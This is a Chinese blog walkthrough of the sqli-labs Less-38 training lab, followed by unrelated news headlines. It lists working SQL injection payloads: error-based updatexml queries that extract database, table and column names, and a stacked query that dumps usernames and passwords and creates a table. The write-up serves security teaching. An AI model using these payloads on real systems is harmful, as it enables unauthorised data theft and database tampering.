sqli-labs/Less-38
创始人
2024-02-06 12:35:08
0

这一关有变成了get请求的题目了

我们先判断一下是否属于数字型注入 输入如下

id=1 and 1=2

回显如下

属于字符型

然后判断一下是单引还是双引 输入1'

 

报错了 从报错信息可知 这是一个单引号注入型 我们去佐证一下呗 输入1'--+

回显如下

 可以 确实是单引号注入型

然后我选择使用报错注入

首先 爆库 输入如下

id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

 回显如下

然后爆表 输入如下

id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

 回显如下

接着进行爆字段操作 输入如下

id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)--+

 回显如下

看到这里我才知道原来这道题要考我们堆叠注入啊

爆用户名我顺便操作一下这个堆叠注入吧 输入如下

id=0' union select 1,2,group_concat(username,password) from users;create table demo like users--+

 回显如下

然后去数据库中查查看有无我刚才新创建的表格demo

 测试成功 通关成功 嗨嗨!! 

相关内容

热门资讯

广东省突发事件应对条例 广东省第十四届 人民代表大会常务委员会 公 告 (第70号) 《广东省突发事件应对条例》已由广东省第...
24万彩礼当场返还!安康瀛湖法... 本平台法律服务由 陕西邦彦律师事务所 提供 12月17日,汉滨法院瀛湖法庭内暖意融融,一起僵持多日的...
辅警工作近6年因有文身被辞退,... 红星新闻消息,2019年9月起,男子刘某入职吉林省农安县公安局交通管理大队,任警务辅助人员,一直到2...
北京朝阳区发布智能机器人“政策... 央广网北京12月20日消息(记者 王进文)12月19日,首届朝阳智能机器人生态大会暨Robo Sum...
《山西省供热管理条例(草案)》... 《山西省供热管理条例(草案)》 公开征求意见建议 公告 山西省第十四届人民代表大会常务委员会第二十五...
日本政策重大转向!专家警示:危... 日本央行19日宣布加息25个基点,政策利率从0.5%上调至0.75%,达30年来最高水平。 这一决策...
最高法院:既有虚假宣传,又有商... 最高法院:虚假宣传与商业诋毁构成竞合,如何处理? 经营者作虚假或者误导性宣传,同时损害竞争对手商誉的...
以色列与哈马斯均被指“消极拖延... 【环球时报驻美国特约记者 丁亮 环球时报特约记者 陈葭】美国阿克西奥斯新闻网援引白宫消息人士的话披露...
实现政策范围内分娩个人“无自付... 12月19日,省医保局发布消息,我省通过提高保障水平、优化经办服务,切实减轻参保职工生育医疗负担,2...
响应河南微短剧政策 大象新闻要... 你日常刷到的短剧,很可能不仅是“河南制造”,更是“大象出品”。 在短剧行业深耕两年多,大象新闻已悄然...